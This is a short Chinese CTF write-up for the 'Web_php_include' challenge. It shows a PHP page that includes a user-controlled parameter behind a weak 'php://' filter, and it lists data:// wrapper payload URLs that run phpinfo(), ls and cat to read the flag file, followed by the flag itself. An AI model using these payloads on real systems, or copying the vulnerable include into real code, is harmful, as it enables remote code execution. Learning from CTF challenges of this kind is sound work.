当前位置: 代码迷 >> 综合 >> Web_php_include 攻防世界
  详细解决方案

Web_php_include 攻防世界

热度:84   发布时间:2023-11-26 04:53:46.0

文章目录

  • 一、审查源码
  • 二、解决步骤
    • 1、使用data://数据流封装器,以传递相应格式的数据。用来执行PHP代码。

一、审查源码

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    # strstr() 查找字符串首次出现的位置。返回字符串剩余部分$page=str_replace("php://", "", $page);# 将$page里面php://替换为空
}
include($page);
?>

http://111.200.241.244:54777/?page=data://text/plain/,%3C?php%20system(%22ls%22)?%3E

二、解决步骤

PHP伪协议:https://segmentfault.com/a/1190000018991087(建议你们去看一下,因为ctf题目经常出现这类型题目)

1、使用data://数据流封装器,以传递相应格式的数据。用来执行PHP代码。

http://111.200.241.244:54777/?page=data://text/plain,<?php phpinfo();?>
在这里插入图片描述
http://111.200.241.244:54777/?page=data://text/plain,%3C?php%20system(%22ls%22);?%3E
在这里插入图片描述
http://111.200.241.244:54777/?page=data://text/plain,%3C?php%20system(%22cat%20fl4gisisish3r3.php%22);?%3E

在这里插入图片描述
ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}